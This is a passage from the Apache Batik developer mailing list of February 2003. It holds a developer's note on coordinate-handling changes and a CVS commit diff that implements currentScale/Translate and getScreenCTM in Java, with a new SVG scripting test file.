e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Feb 24 16:58:53 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61439 invoked by uid 500); 24 Feb 2003 16:58:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61412 invoked from network); 24 Feb 2003 16:58:50 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Mon, 24 Feb 2003 11:58:41 -0500 To: "'Batik Users'" <[email protected]>, "'Batik Developers'" <[email protected]> Subject: SVGLocatable, currentScale/Translate, evt.clientX/Y X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hi all, This is a bit of a warning. I will shortly be committing new code that implements currentScale/Translate. In the processes I cleaned up and fixed several of the SVGLocatable methods dealing with transformations (including getCTM and getScreenCTM - which is now implemented). In the processes I had to fix the values in clientX/Y in mouse events. They had been values in the viewBox coordinate system, so any rendering transform or viewbox transform had already been applied. They are now returned as viewport coordinates (i.e. pixel locations in the JSVGComponent). Clearly viewbox values are generally more useful however because these values are integers there are issues with viewBox attributes like "0 0 1 1" which are common in some uses. Fortunately because Batik now implements getScreenCTM you have a much better way to handle currentX/Y, that can give you accurate location information for any element: function getLocationOnElement(evt, elem) { mat = elem.getScreenCTM(); imat = mat.inverse(); // Go from screen to elem var pt = document.rootElement.createSVGPoint(); pt.x = evt.clientX; pt.y = evt.clientY; pt = pt.matrixTransform(imat); return pt; } As part of these changes I also modified the bootstrap proceedure in JSVGComponent. In the past it would requests a new size and immediately start a rendering, with the old size. This rendering would usually be cancelled by the resize event. Now the JSVGComponent attempts to find it's Window (by calling getParent) and call pack() on it to force a relayout so it can determine it's new size before calling onload scripts. In cases where it can't find it's Window it should behave exactly the same as it always has (with two renderings). There have also been some minor interface changes on some "internal" JSVGComponent methods (updateTransform, computeTransform). So developers who have modified pieces of Batik may want to be a bit careful before doing a CVS update. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Feb 24 18:25:58 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79024 invoked by uid 500); 24 Feb 2003 18:25:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78999 invoked by uid 500); 24 Feb 2003 18:25:56 -0000 Delivered-To: [email protected] Date: 24 Feb 2003 18:25:54 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-batik/test-resources/org/apache/batik/test samplesRendering.xml X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N deweese 2003/02/24 10:25:54 Modified: sources/org/apache/batik/bridge AbstractGraphicsNodeBridge.java BridgeContext.java SVGSVGElementBridge.java SVGTextElementBridge.java UpdateManager.java UserAgent.java UserAgentAdapter.java UserAgentViewport.java sources/org/apache/batik/dom/svg SVGContext.java SVGLocatableSupport.java SVGOMSVGElement.java SVGTextContent.java sources/org/apache/batik/gvt AbstractGraphicsNode.java CanvasGraphicsNode.java sources/org/apache/batik/gvt/event AWTEventDispatcher.java sources/org/apache/batik/swing JSVGCanvas.java sources/org/apache/batik/swing/gvt JGVTComponent.java sources/org/apache/batik/swing/svg JSVGComponent.java sources/org/apache/batik/transcoder SVGAbstractTranscoder.java test-resources/org/apache/batik/test samplesRendering.xml Added: samples/tests/spec/scripting currentScaleTranslate.svg sources/org/apache/batik/dom/svg SVGOMPoint.java SVGOMRect.java Log: 1) Implemented currentScale/Translate 2) Implemented getScreenCTM, fixed getCTM 3) 1&2 work with Transcoders as well (if -onload is given). 4) Fixed clientX/Y values in MouseEvents. 5) JSVGComponent no longer redraws/cancels/redraws for most cases Revision Changes Path 1.1 xml-batik/samples/tests/spec/scripting/currentScaleTranslate.svg Index: currentScaleTranslate.svg =================================================================== <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"> <!-- ====================================================================== --> <!-- Copyright (C) The Apache Software Foundation. All rights reserved. --> <!-- --> <!-- This software is published under the terms of the Apache Software --> <!-- License version 1.1, a copy of which has been included with this --> <!-- distribution in the LICENSE file. --> <!-- ====================================================================== --> <!-- ====================================================================== --> <!-- append child test --> <!-- --> <!-- @author [email protected] --> <!-- @version $Id: currentScaleTranslate.svg,v 1.1 2003/02/24 18:25:52 deweese Exp $ --> <!-- ====================================================================== --> <?xml-stylesheet type="text/css" href="../../resources/style/test.css" ?> <svg id="body" width="450" height="500" viewBox="0 0 450 500" onload="setScaleTrans(2, 50, 50), update()" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>svg current scale/translate modification</title> <script type="text/ecmascript"><![CDATA[ var count = 1; function setScaleTrans(scale, newX, newY) { document.getRootElement().currentScale = scale; var pt = document.getRootElement().currentTranslate; pt.x = newX; pt.y = newX; } function update() { if ((count%10) == 0) { var scale = 1+((count/10)%10)/4; document.getRootElement().currentScale = scale; } var t; var mat; t = document.getElementById('cnt'); t.firstChild.data = ("Count: " + count); mat = t.getScreenCTM(); t = document.getElementById('foo'); t.firstChild.data = "The ScrnCTM is: (" + mat.a +","+ mat.b +","+ mat.c +","+ mat.d +","+ mat.e +","+ mat.f +")"; mat = t.getCTM(); t = document.getElementById('bar'); t.firstChild.data = "The CTM is: (" + mat.a +","+ mat.b +","+ mat.c +","+ mat.d +","+ mat.e +","+ mat.f +")"; var scale = document.getRootElement().currentScale; t = document.getElementById('baz'); t.firstChild.data = "The Scale is: "+scale; var trans = document.getRootElement().currentTranslate; t = document.getElementById('bat'); t.firstChild.data = "The Trans is ["+trans.x+", " +trans.y+"]"; t = document.getElementById('vp'); var vp = document.rootElement.viewport; t.firstChild.data = ("Viewport: ["+ vp.x+", " +vp.y+", " + vp.width+", " +vp.height+"]"); count++; setTimeout('update()', 1000); } function mouseOver(evt) { t = document.getElementById('rec'); var x = evt.getClientX(); var y = evt.getClientY(); mat = t.getScreenCTM(); imat = mat.inverse(); var pt = document.getRootElement().createSVGPoint(); pt.x = x; pt.y = y; pt = pt.matrixTransform(imat); t.firstChild.data = ("Loc: [" + evt.getClientX() + ", " + evt.getClientY() + "] [" + pt.x + ", " + pt.y + "]"); } ]]></script> <g id="test-content"> <rect x="0" y="0" width="450" height="500" fill="lightgrey" stroke="black" onmousemove="mouseOver(evt)"/> <text id="cnt" x="10" y=" 80">test</text> <text id="foo" x="10" y="100">test</text> <text id="bar" x="10" y="120">test</text> <text id="baz" x="10" y="140">test</text> <text id="bat" x="10" y="160">test</text> <text id="vp" x="10" y="180">test</text> <text id="rec" x="10" y="200">test</text> </g> </svg> 1.28 +34 -7 xml-batik/sources/org/apache/batik/bridge/AbstractGraphicsNodeBridge.java Index: AbstractGraphicsNodeBridge.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/AbstractGraphicsNodeBridge.java,v retrieving revision 1.27 retrieving revision 1.28 diff -u -r1.27 -r1.28 --- AbstractGraphicsNodeBridge.java 12 Jun 2002 08:20:34 -0000 1.27 +++ AbstractGraphicsNodeBridge.java 24 Feb 2003 18:25:52 -0000 1.28 @@ -17,8 +17,11 @@ import org.apache.batik.dom.svg.SVGContext; import org.apache.batik.dom.svg.SVGOMElement; -import org.apache.batik.gvt.GraphicsNode; import org.apache.batik.gvt.CompositeGraphicsNode; +import org.apache.batik.gvt.CanvasGraphicsNode; +import org.apache.batik.gvt.GraphicsNode; +import org.apache.batik.gvt.RootGraphicsNode; + import org.w3c.dom.Element; import org.w3c.dom.Node; @@ -312,17 +315,41 @@ AffineTransform ctm = new AffineTransform(); Element elt = e; while (elt != null) { + if (elt instanceof SVGFitToViewBox) { + AffineTransform at; + if (gn instanceof CanvasGraphicsNode) { + at = ((CanvasGraphicsNode)gn).getViewingTransform(); + } else { + at = gn.getTransform(); + } + if (at != null) { + ctm.preConcatenate(at); + } + break; + } + AffineTransform at = gn.getTransform(); - if (at != null) { + if (at != null) ctm.preConcatenate(at); - } + elt = SVGCSSEngine.getParentCSSStylableElement(elt); gn = gn.getParent(); - if (elt instanceof SVGFitToViewBox) { - break; - } } return ctm; + } + + /** + * Returns the display transform. + */ + public AffineTransform getScreenTransform() { + return ctx.getUserAgent().getTransform(); + } + + /** + * Returns the display transform. + */ + public void setScreenTransform(AffineTransform at) { + ctx.getUserAgent().setTransform(at); } /** 1.56 +5 -1 xml-batik/sources/org/apache/batik/bridge/BridgeContext.java Index: BridgeContext.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/BridgeContext.java,v retrieving revision 1.55 retrieving revision 1.56 diff -u -r1.55 -r1.56 --- BridgeContext.java 14 Nov 2002 19:44:49 -0000 1.55 +++ BridgeContext.java 24 Feb 2003 18:25:52 -0000 1.56 @@ -519,6 +519,10 @@ viewportStack.add(0, viewport); } + public void removeViewport(Element e) { + viewportMap.remove(e); + } + /** * Closes the viewport associated to the specified element. * @param e the element that closes its viewport 1.31 +25 -14 xml-batik/sources/org/apache/batik/bridge/SVGSVGElementBridge.java Index: SVGSVGElementBridge.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/SVGSVGElementBridge.java,v retrieving revision 1.30 retrieving revision 1.31 diff -u -r1.30 -r1.31 --- SVGSVGElementBridge.java 4 Jul 2002 07:19:02 -0000 1.30 +++ SVGSVGElementBridge.java 24 Feb 2003 18:25:52 -0000 1.31 @@ -70,7 +70,7 @@ return null; } - CanvasGraphicsNode gn = new CanvasGraphicsNode(); + CanvasGraphicsNode cgn = new CanvasGraphicsNode(); UnitProcessor.Context uctx = UnitProcessor.createContext(ctx, e); String s; @@ -111,28 +111,29 @@ (s, SVG_HEIGHT_ATTRIBUTE, uctx); // 'visibility' - gn.setVisible(CSSUtilities.convertVisibility(e)); + cgn.setVisible(CSSUtilities.convertVisibility(e)); // 'viewBox' and "preserveAspectRatio' attributes - AffineTransform at = + AffineTransform viewingTransform = ViewBox.getPreserveAspectRatioTransform(e, w, h); float actualWidth = w; float actualHeight = h; try { - AffineTransform atInv = at.createInverse(); - actualWidth = (float) (w*atInv.getScaleX()); - actualHeight = (float) (h*atInv.getScaleY()); + AffineTransform vtInv = viewingTransform.createInverse(); + actualWidth = (float) (w*vtInv.getScaleX()); + actualHeight = (float) (h*vtInv.getScaleY()); } catch (NoninvertibleTransformException ex) {} - at.preConcatenate(AffineTransform.getTranslateInstance(x, y)); - + AffineTransform positionTransform = + AffineTransform.getTranslateInstance(x, y); // 'overflow' and 'clip' // The outermost preserveAspectRatio matrix is set by the user // agent, so we don't need to set the transform for outermost svg Shape clip = null; if (!isOutermost) { - gn.setTransform(at); + cgn.setPositionTransform(positionTransform); + cgn.setViewingTransform(viewingTransform); } else { // <!> FIXME: hack to compute the original document's size if (ctx.getDocumentSize() == null) { @@ -158,24 +159,26 @@ if (clip != null) { try { + AffineTransform at = new AffineTransform(positionTransform); + at.concatenate(viewingTransform); at = at.createInverse(); // clip in user space clip = at.createTransformedShape(clip); - Filter filter = gn.getGraphicsNodeRable(true); - gn.setClip(new ClipRable8Bit(filter, clip)); + Filter filter = cgn.getGraphicsNodeRable(true); + cgn.setClip(new ClipRable8Bit(filter, clip)); } catch (NoninvertibleTransformException ex) {} } // 'enable-background' Rectangle2D r = CSSUtilities.convertEnableBackground(e); if (r != null) { - gn.setBackgroundEnable(r); + cgn.setBackgroundEnable(r); } ctx.openViewport (e, new SVGSVGElementViewport((SVGSVGElement)e, actualWidth, actualHeight)); - return gn; + return cgn; } /** @@ -199,6 +202,14 @@ } // BridgeUpdateHandler implementation ////////////////////////////////// + + /** + * Disposes this BridgeUpdateHandler and releases all resources. + */ + public void dispose() { + ctx.removeViewport(e); + super.dispose(); + } /** * Invoked when an MutationEvent of type 'DOMAttrModified' is fired. 1.74 +19 -1 xml-batik/sources/org/apache/batik/bridge/SVGTextElementBridge.java Index: SVGTextElementBridge.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/SVGTextElementBridge.java,v retrieving revision 1.73 retrieving revision 1.74 diff -u -r1.73 -r1.74 --- SVGTextElementBridge.java 19 Feb 2003 02:50:56 -0000 1.73 +++ SVGTextElementBridge.java 24 Feb 2003 18:25:52 -0000 1.74 @@ -1901,6 +1901,24 @@ } /** + * Returns the transformation matrix from the userspace of + * the root element to the screen. + */ + public AffineTransform getScreenTransform() { + //return node.getScreenTransform(); + return null; + } + + /** + * Sets the transformation matrix to be used from the + * userspace of the root element to the screen. + */ + public void setScreenTransform(AffineTransform at) { + //return node.setScreenTransform(at); + return; + } + + /** * Returns the width of the viewport which directly contains the * given element. */ 1.19 +1 -2 xml-batik/sources/org/apache/batik/bridge/UpdateManager.java Index: UpdateManager.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/UpdateManager.java,v retrieving revision 1.18 retrieving revision 1.19 diff -u -r1.18 -r1.19 --- UpdateManager.java 25 Sep 2002 11:59:59 -0000 1.18 +++ UpdateManager.java 24 Feb 2003 18:25:52 -0000 1.19 @@ -150,7 +150,6 @@ throws InterruptedException { scriptingEnvironment.loadScripts(); scriptingEnvironment.dispatchSVGLoadEvent(); - } /** 1.25 +7 -1 xml-batik/sources/org/apache/batik/bridge/UserAgent.java Index: UserAgent.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/UserAgent.java,v retrieving revision 1.24 retrieving revision 1.25 diff -u -r1.24 -r1.25 --- UserAgent.java 5 Sep 2002 12:58:18 -0000 1.24 +++ UserAgent.java 24 Feb 2003 18:25:52 -0000 1.25 @@ -143,6 +143,12 @@ AffineTransform getTransform(); /** + * Sets the <code>AffineTransform</code> currently + * applied to the drawing by the UserAgent. + */ + void setTransform(AffineTransform at); + + /** * Returns this user agent's CSS media. */ String getMedia(); 1.12 +8 -1 xml-batik/sources/org/apache/batik/bridge/UserAgentAdapter.java Index: UserAgentAdapter.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/UserAgentAdapter.java,v retrieving revision 1.11 retrieving revision 1.12 diff -u -r1.11 -r1.12 --- UserAgentAdapter.java 5 Sep 2002 12:58:18 -0000 1.11 +++ UserAgentAdapter.java 24 Feb 2003 18:25:52 -0000 1.12 @@ -223,6 +223,13 @@ /** * Unsupported operation. */ + public void setTransform(AffineTransform at) { + // Do nothing. + } + + /** + * Unsupported operation. + */ public Point getClientAreaLocationOnScreen() { return new Point(); } 1.3 +5 -7 xml-batik/sources/org/apache/batik/bridge/UserAgentViewport.java Index: UserAgentViewport.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/UserAgentViewport.java,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- UserAgentViewport.java 8 Mar 2001 12:39:31 -0000 1.2 +++ UserAgentViewport.java 24 Feb 2003 18:25:52 -0000 1.3 @@ -16,29 +16,27 @@ */ public class UserAgentViewport implements Viewport { - private float width; - private float height; + private UserAgent userAgent; /** * Constructs a new viewport for the specified user agent. * @param userAgent the user agent that defines the viewport */ public UserAgentViewport(UserAgent userAgent) { - width = (float) userAgent.getViewportSize().getWidth(); - height = (float) userAgent.getViewportSize().getHeight(); + this.userAgent = userAgent; } /** * Returns the width of this viewport. */ public float getWidth() { - return width; + return (float) userAgent.getViewportSize().getWidth(); } /** * Returns the height of this viewport. */ public float getHeight() { - return height; + return (float) userAgent.getViewportSize().getHeight(); } } 1.10 +11 -1 xml-batik/sources/org/apache/batik/dom/svg/SVGContext.java Index: SVGContext.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/dom/svg/SVGContext.java,v retrieving revision 1.9 retrieving revision 1.10 diff -u -r1.9 -r1.10 --- SVGContext.java 5 Jun 2002 21:14:48 -0000 1.9 +++ SVGContext.java 24 Feb 2003 18:25:53 -0000 1.10 @@ -40,6 +40,16 @@ Rectangle2D getBBox(); /** + * Returns the transform from the global transform space to pixels. + */ + AffineTransform getScreenTransform(); + + /** + * Sets the transform to be used from the global transform space to pixels. + */ + void setScreenTransform(AffineTransform at); + + /** * Returns the transformation matrix from current user units * (i.e., after application of the transform attribute, if any) to * the viewport coordinate system for the nearestViewportElement. 1.6 +12 -2 xml-batik/sources/org/apache/batik/dom/svg/SVGLocatableSupport.java Index: SVGLocatableSupport.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/dom/svg/SVGLocatableSupport.java,v retrieving revision 1.5 retrieving revision 1.6 diff -u -r1.5 -r1.6 --- SVGLocatableSupport.java 24 Apr 2002 13:01:26 -0000 1.5 +++ SVGLocatableSupport.java 24 Feb 2003 18:25:53 -0000 1.6 @@ -118,7 +118,17 @@ * org.w3c.dom.svg.SVGLocatable#getScreenCTM()}. */ public static SVGMatrix getScreenCTM(Element elt) { - throw new RuntimeException(" !!! TODO: getScreenCTM()"); + final SVGOMElement svgelt = (SVGOMElement)elt; + return new AbstractSVGMatrix() { + protected AffineTransform getAffineTransform() { + SVGContext context = svgelt.getSVGContext(); + AffineTransform ret = context.getGlobalTransform(); + AffineTransform scrnTrans = context.getScreenTransform(); + if (scrnTrans != null) + ret.preConcatenate(scrnTrans); + return ret; + } + }; } /** 1.20 +77 -34 xml-batik/sources/org/apache/batik/dom/svg/SVGOMSVGElement.java Index: SVGOMSVGElement.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/dom/svg/SVGOMSVGElement.java,v retrieving revision 1.19 retrieving revision 1.20 diff -u -r1.19 -r1.20 --- SVGOMSVGElement.java 14 Aug 2002 14:12:22 -0000 1.19 +++ SVGOMSVGElement.java 24 Feb 2003 18:25:53 -0000 1.20 @@ -8,6 +8,8 @@ package org.apache.batik.dom.svg; +import java.awt.geom.AffineTransform; + import org.apache.batik.dom.AbstractDocument; import org.apache.batik.dom.util.XLinkSupport; import org.apache.batik.dom.util.XMLSupport; @@ -178,8 +180,10 @@ * <b>DOM</b>: Implements {@link SVGSVGElement#getViewport()}. */ public SVGRect getViewport() { - throw new RuntimeException(" !!! TODO: getViewport()"); - } + SVGContext ctx = getSVGContext(); + return new SVGOMRect(0, 0, ctx.getViewportWidth(), + ctx.getViewportHeight()); + } public float getPixelUnitToMillimeterX( ) { throw new Error(); @@ -204,15 +208,72 @@ throw new Error(); } public float getCurrentScale( ) { - throw new Error(); - } - public void setCurrentScale( float currentScale ) - throws DOMException { - throw new Error(); + AffineTransform scrnTrans = getSVGContext().getScreenTransform(); + if (scrnTrans != null) + return (float)Math.sqrt(scrnTrans.getDeterminant()); + return 1; + } + public void setCurrentScale( float currentScale ) throws DOMException { + SVGContext context = getSVGContext(); + AffineTransform scrnTrans = context.getScreenTransform(); + float scale = 1; + if (scrnTrans != null) + scale = (float)Math.sqrt(scrnTrans.getDeterminant()); + float delta = currentScale/scale; + // The way currentScale, currentTranslate are defined + // changing scale has no effect on translate. + scrnTrans = new AffineTransform + (scrnTrans.getScaleX()*delta, scrnTrans.getShearY()*delta, + scrnTrans.getShearX()*delta, scrnTrans.getScaleY()*delta, + scrnTrans.getTranslateX(), scrnTrans.getTranslateY()); + context.setScreenTransform(scrnTrans); } + public SVGPoint getCurrentTranslate( ) { - throw new Error(); + final SVGOMElement svgelt = this; + return new SVGPoint() { + AffineTransform getScreenTransform() { + SVGContext context = svgelt.getSVGContext(); + return context.getScreenTransform(); + } + + public float getX() { + AffineTransform scrnTrans = getScreenTransform(); + return (float)scrnTrans.getTranslateX(); + } + public float getY() { + AffineTransform scrnTrans = getScreenTransform(); + return (float)scrnTrans.getTranslateY(); + } + public void setX(float newX) { + SVGContext context = svgelt.getSVGContext(); + AffineTransform scrnTrans = context.getScreenTransform(); + scrnTrans = new AffineTransform + (scrnTrans.getScaleX(), scrnTrans.getShearY(), + scrnTrans.getShearX(), scrnTrans.getScaleY(), + newX, scrnTrans.getTranslateY()); + context.setScreenTransform(scrnTrans); + } + public void setY(float newY) { + SVGContext context = svgelt.getSVGContext(); + AffineTransform scrnTrans = context.getScreenTransform(); + scrnTrans = new AffineTransform + (scrnTrans.getScaleX(), scrnTrans.getShearY(), + scrnTrans.getShearX(), scrnTrans.getScaleY(), + scrnTrans.getTranslateX(), newY); + context.setScreenTransform(scrnTrans); + } + public SVGPoint matrixTransform ( SVGMatrix mat ) { + AffineTransform scrnTrans = getScreenTransform(); + float x = (float)scrnTrans.getTranslateX(); + float y = (float)scrnTrans.getTranslateY(); + float newX = mat.getA()*x + mat.getC()*y + mat.getE(); + float newY = mat.getB()*x + mat.getD()*y + mat.getF(); + return new SVGOMPoint(newX, newY); + } + }; } + public int suspendRedraw ( int max_wait_milliseconds ) { throw new Error(); } @@ -290,32 +351,17 @@ * <b>DOM</b>: Implements {@link SVGSVGElement#createSVGPoint()}. */ public SVGPoint createSVGPoint() { - return new SVGPoint() { - float x; - float y; - public float getX() { - return x; - } - public void setX(float x) throws DOMException { - this.x = x; - } - public float getY() { - return y; - } - public void setY(float y) throws DOMException { - this.y = y; - } - public SVGPoint matrixTransform(SVGMatrix matrix) { - throw new RuntimeException("!!! TODO: matrixTransform()"); - } - }; + return new SVGOMPoint(0, 0); } public SVGMatrix createSVGMatrix ( ) { - throw new Error(); + return new AbstractSVGMatrix() { + AffineTransform at = new AffineTransform(); + protected AffineTransform getAffineTransform() { return at; } + }; } public SVGRect createSVGRect ( ) { - throw new Error(); + return new SVGOMRect(0,0,0,0); } public SVGTransform createSVGTransform ( ) { throw new Error(); @@ -323,11 +369,8 @@ public SVGTransform createSVGTransformFromMatrix ( SVGMatrix matrix ) { throw new Error(); } - public String createSVGString ( ) { - throw new Error(); - } public Element getElementById ( String elementId ) { - throw new Error(); + return ((SVGOMDocument)getDocument()).getElementById(elementId); } // SVGLocatable /////////////////////////////////////////////////////// 1.2 +1 -141 xml-batik/sources/org/apache/batik/dom/svg/SVGTextContent.java Index: SVGTextContent.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/dom/svg/SVGTextContent.java,v retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- SVGTextContent.java 19 Feb 2003 02:50:57 -0000 1.1 +++ SVGTextContent.java 24 Feb 2003 18:25:53 -0000 1.2 @@ -1,141 +1 @@ -/***************************************************************************** - * Copyright (C) The Apache Software Foundation. All rights reserved. * - * ------------------------------------------------------------------------- * - * This software is published under the terms of the Apache Software License * - * version 1.1, a copy of which has been included with this distribution in * - * the LICENSE file. * - *****************************************************************************/ - -package org.apache.batik.dom.svg; - -import java.awt.geom.Rectangle2D; -import java.awt.geom.Point2D; - -import org.w3c.dom.DOMException; - -/** - * This class provides the interface for the SVGTextContentElement - * for the bridge to implement. - * - * @author [email protected] - * @version $Id$ - */ -public interface SVGTextContent -{ - /** - * Returns the total number of characters to be - * rendered within the current element. - * Includes characters which are included - * via a &lt;tref&gt; reference. - * - * @return Total number of characters. - */ - public int getNumberOfChars(); - - /** - * Returns a tightest rectangle which defines the - * minimum and maximum X and Y values in the user - * coordinate system for rendering the glyph(s) - * that correspond to the specified character. - * The calculations assume that all glyphs occupy - * the full standard glyph cell for the font. If - * multiple consecutive characters are rendered - * inseparably (e.g., as a single glyph or a - * sequence of glyphs), then each of the inseparable - * characters will return the same extent. - * - * @param charnum The index of the character, where the - * first character has an index of 0. - * @return The rectangle which encloses all of - * the rendered glyph(s). - */ - public Rectangle2D getExtentOfChar(int charnum ); - - /** - * Returns the current text position before rendering - * the character in the user coordinate system for - * rendering the glyph(s) that correspond to the - * specified character. The current text position has - * already taken into account the effects of any inter- - * character adjustments due to properties 'kerning', - * 'letter-spacing' and 'word-spacing' and adjustments - * due to attributes x, y, dx and dy. If multiple - * consecutive characters are rendered inseparably - * (e.g., as a single glyph or a sequence of glyphs), - * then each of the inseparable characters will return - * the start position for the first glyph. - * - * @param charnum The index of the character, where the - * first character has an index of 0. - * @return The character's start position. - */ - public Point2D getStartPositionOfChar(int charnum); - - /** - * Returns the current text position after rendering - * the character in the user coordinate system for - * rendering the glyph(s) that correspond to the - * specified character. This current text position - * does not take into account the effects of any inter- - * character adjustments to prepare for the next - * character, such as properties 'kerning', - * 'letter-spacing' and 'word-spacing' and adjustments - * due to attributes x, y, dx and dy. If multiple - * consecutive characters are rendered inseparably - * (e.g., as a single glyph or a sequence of glyphs), - * then each of the inseparable characters will return - * the end position for the last glyph. - * - * @param charnum The index of the character, where the - * first character has an index of 0. - * @return The character's end position. - */ - public Point2D getEndPositionOfChar(int charnum); - - /** - * Returns the rotation value relative to the current - * user coordinate system used to render the glyph(s) - * corresponding to the specified character. If - * multiple glyph(s) are used to render the given - * character and the glyphs each have different - * rotations (e.g., due to text-on-a-path), the user - * agent shall return an average value (e.g., the - * rotation angle at the midpoint along the path for - * all glyphs used to render this character). The - * rotation value represents the rotation that is - * supplemental to any rotation due to properties - * 'glyph-orientation-horizontal' and - * 'glyph-orientation-vertical'; thus, any glyph - * rotations due to these properties are not included - * into the returned rotation value. If multiple - * consecutive characters are rendered inseparably - * (e.g., as a single glyph or a sequence of glyphs), - * then each of the inseparable characters will - * return the same rotation value. - * - * @param charnum The index of the character, where the - * first character has an index of 0. - * @return The character's rotation angle. - */ - public float getRotationOfChar(int charnum); - /** - * Causes the specified substring to be selected - * just as if the user selected the substring interactively. - * - * @param charnum : The index of the start character - * which is at the given point, where the first - * character has an index of 0. - * @param nchars : The number of characters in the - * substring. If nchars specifies more characters - * than are available, then the substring will - * consist of all characters starting with charnum - * until the end of the list of characters. - */ - public void selectSubString(int charnum, int nchars); - - public float getComputedTextLength(); - - public float getSubStringLength(int charnum, int nchars); - - public int getCharNumAtPosition(float x, float y); -} +/***************************************************************************** * Copyright (C) The Apache Software Foundation. All rights reserved. * * ------------------------------------------------------------------------- * * This software is published under the terms of the Apache Software License * * version 1.1, a copy of which has been included with this distribution in * * the LICENSE file. * *****************************************************************************/ package org.apache.batik.dom.svg; import java.awt.geom.Rectangle2D; import java.awt.geom.Point2D; import org.w3c.dom.DOMException; /** * This class provides the interface for the SVGTextContentElement * for the bridge to implement. * * @author [email protected] * @version $Id$ */ public interface SVGTextContent { /** * Returns the total number of characters to be * rendered within the current element. * Includes characters which are included * via a &lt;tref&gt; reference. * * @return Total number of characters. */ public int getNumberOfChars(); /** * Returns a tightest rectangle which defines the * minimum and maximum X and Y values in the user * coordinate system for rendering the glyph(s) * that correspond to the specified character. * The calculations assume that all glyphs occupy * the full standard glyph cell for the font. If * multiple consecutive characters are rendered * inseparably (e.g., as a single glyph or a * sequence of glyphs), then each of the inseparable * characters will return the same extent. * * @param charnum The index of the character, where the * first character has an index of 0. * @return The rectangle which encloses all of * the rendered glyph(s). */ public Rectangle2D getExtentOfChar(int charnum ); /** * Returns the current text position before rendering * the character in the user coordinate system for * rendering the glyph(s) that correspond to the * specified character. The current text position has * already taken into account the effects of any inter- * character adjustments due to properties 'kerning', * 'letter-spacing' and 'word-spacing' and adjustments * due to attributes x, y, dx and dy. If multiple * consecutive characters are rendered inseparably * (e.g., as a single glyph or a sequence of glyphs), * then each of the inseparable characters will return * the start position for the first glyph. * * @param charnum The index of the character, where the * first character has an index of 0. * @return The character's start position. */ public Point2D getStartPositionOfChar(int charnum); /** * Returns the current text position after rendering * the character in the user coordinate system for * rendering the glyph(s) that correspond to the * specified character. This current text position * does not take into account the effects of any inter- * character adjustments to prepare for the next * character, such as properties 'kerning', * 'letter-spacing' and 'word-spacing' and adjustments * due to attributes x, y, dx and dy. If multiple * consecutive characters are rendered inseparably * (e.g., as a single glyph or a sequence of glyphs), * then each of the inseparable characters will return * the end position for the last glyph. * * @param charnum The index of the character, where the * first character has an index of 0. * @return The character's end position. */ public Point2D getEndPositionOfChar(int charnum); /** * Returns the rotation value relative to the current * user coordinate system used to render the glyph(s) * corresponding to the specified character. If * multiple glyph(s) are used to render the given * character and the glyphs each have different * rotations (e.g., due to text-on-a-path), the user * agent shall return an average value (e.g., the * rotation angle at the midpoint along the path for * all glyphs used to render this character). The * rotation value represents the rotation that is * supplemental to any rotation due to properties * 'glyph-orientation-horizontal' and * 'glyph-orientation-vertical'; thus, any glyph * rotations due to these properties are not included * into the returned rotation value. If multiple * consecutive characters are rendered inseparably * (e.g., as a single glyph or a sequence of glyphs), * then each of the inseparable characters will * return the same rotation value. * * @param charnum The index of the character, where the * first character has an index of 0. * @return The character's rotation angle. */ public float getRotationOfChar(int charnum); /** * Causes the specified substring to be selected * just as if the user selected the substring interactively. * * @param charnum : The index of the start character * which is at the given point, where the first * character has an index of 0. * @param nchars : The number of characters in the * substring. If nchars specifies more characters * than are available, then the substring will * consist of all characters starting with charnum * until the end of the list of characters. */ public void selectSubString(int charnum, int nchars); public float getComputedTextLength(); public float getSubStringLength(int charnum, int nchars); public int getCharNumAtPosition(float x, float y); } \ No newline at end of file 1.1 xml-batik/sources/org/apache/batik/dom/svg/SVGOMPoint.java Index: SVGOMPoint.java =================================================================== /***************************************************************************** * Copyright (C) The Apache Software Foundation. All rights reserved. * * ------------------------------------------------------------------------- * * This software is published under the terms of the Apache Software License * * version 1.1, a copy of which has been included with this 